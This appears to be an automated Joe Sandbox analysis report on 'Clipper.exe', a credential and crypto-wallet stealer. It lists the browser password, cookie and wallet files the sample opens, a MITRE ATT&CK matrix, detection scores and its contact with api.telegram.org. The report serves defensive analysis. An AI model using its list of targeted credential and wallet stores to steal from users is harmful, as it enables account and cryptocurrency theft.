Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
MITRE ATT&CK matrix, listed by tactic (the digits preceding a technique are the counts shown in the report's matrix):

  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
  • Execution: 31 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
  • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
  • Privilege Escalation: 11 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
  • Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
  • Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
  • Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 22 System Information Discovery; System Owner/User Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
  • Collection: 3 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
  • Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Source | Detection | Scanner | Label
Clipper.exe | 54% | ReversingLabs | Win32.Trojan.Generic
Clipper.exe | 45% | Virustotal |
Clipper.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
ipwho.is | 0% | Virustotal |
api.telegram.org | 2% | Virustotal |
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1450354
Start date and time: 2024-06-01 18:45:56 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Clipper.exe
Detection: MAL
Classification: mal76.troj.spyw.evad.winEXE@4/14@2/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • Not all processes were analyzed; the report is missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:46:43 | API Interceptor | 1x Sleep call for process: Clipper.exe modified
12:46:46 | API Interceptor | 4x Sleep call for process: powershell.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
149.154.167.220Cryptor.exeGet hashmaliciousLuca StealerBrowse
    Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
          SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            Attachments.zipGet hashmaliciousUnknownBrowse
              DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                  sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                    Due Invoice pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      195.201.57.90cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                      • /?output=json
                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      • /?output=json
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • /?output=json
                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                      • /?output=json
                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                      • /?output=json
                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • /?output=json
                      3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/
                      KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                      • ipwhois.app/xml/
                      file.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/
                      file.exeGet hashmaliciousBlackGuardBrowse
                      • ipwhois.app/xml/
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ipwho.iscOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 195.201.57.90
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 195.201.57.90
                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                      • 195.201.57.90
                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                      • 195.201.57.90
                      KR6nDu9fLhop1bFe.exeGet hashmaliciousQuasarBrowse
                      • 195.201.57.90
                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 195.201.57.90
                      http://nxxoui9ah5qto.pages.dev/smart89Get hashmaliciousUnknownBrowse
                      • 195.201.57.90
                      01vwXiyQ8K.exeGet hashmaliciousQuasarBrowse
                      • 195.201.57.90
                      http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                      • 195.201.57.90
                      api.telegram.orgCryptor.exeGet hashmaliciousLuca StealerBrowse
                      • 149.154.167.220
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                      • 149.154.167.220
                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 149.154.167.220
                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                      • 149.154.167.220
                      SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 149.154.167.220
                      Attachments.zipGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.220
                      Due Invoice pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                      • 149.154.167.220
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
TELEGRAM RU | Cryptor.exe | malicious | Luca Stealer | 149.154.167.220
TELEGRAM RU | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
TELEGRAM RU | SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe | malicious | CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 149.154.167.99
TELEGRAM RU | 9JVOOyGBXT.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAM RU | ajb5QcGVGK.exe | malicious | DCRat | 149.154.167.220
TELEGRAM RU | http://www.aviatorx.sbs.recl.cc/ | malicious | Unknown | 149.154.167.99
TELEGRAM RU | http://telegram-vn.com/ | malicious | Unknown | 149.154.167.99
TELEGRAM RU | http://dl.dir.freefiremobile.com.sg5.putrivpn.biz.id/ | malicious | Unknown | 149.154.167.99
TELEGRAM RU | http://b9824.top/ | malicious | Unknown | 149.154.170.96
TELEGRAM RU | Rtq5bR0yeF.exe | malicious | RedLine | 149.154.167.99
HETZNER-AS DE | cOQD62FceM.exe | malicious | Luca Stealer | 195.201.57.90
HETZNER-AS DE | Cryptor.exe | malicious | Luca Stealer | 195.201.57.90
HETZNER-AS DE | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 195.201.57.90
HETZNER-AS DE | SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe | malicious | CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 159.69.102.132
HETZNER-AS DE | 3Lf408k9mg.exe | malicious | PureLog Stealer, SystemBC | 116.202.102.103
HETZNER-AS DE | PAYMENT RECEIPT.exe | malicious | FormBook | 178.63.50.103
HETZNER-AS DE | RFQ price list.scr.exe | malicious | Unknown | 88.99.137.18
HETZNER-AS DE | Revised Order.exe | malicious | DarkTortilla, FormBook | 135.181.212.206
HETZNER-AS DE | RFQ price list.scr.exe | malicious | Unknown | 88.99.137.18
HETZNER-AS DE | QT-2402078.scr.exe | malicious | Unknown | 88.99.137.18
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
3b5074b1b5d032e5620f69f9f700ff0e | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe | malicious | AsyncRAT, DcRat | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Authenticator.exe | malicious | BazaLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Payment Advice Ref 20240516908654223454899.scr.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Aviz de Plata_Comert_Bank_pdf.scr.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | IKwhIZp9xe.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Aviz de Plata_Comert_Bank_pdf.scr.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Biodu Kenya Ltd.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | PROFORMA INV.pif.exe | malicious | FormBook, PureLog Stealer | 149.154.167.220
                      No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul3nqth:NllUa
MD5: 851531B4FD612B0BC7891B3F401A478F
SHA1: 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256: 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512: A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................&..............@..........
Process: C:\Users\user\Desktop\Clipper.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
Reputation: high, very likely benign file
                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Clipper.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 155648
Entropy (8bit): 0.5407252242845243
Encrypted: false
SSDEEP: 96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5: 7B955D976803304F2C0505431A0CF1CF
SHA1: E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256: 987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512: CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious: false
Reputation: high, very likely benign file
                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Clipper.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 51200
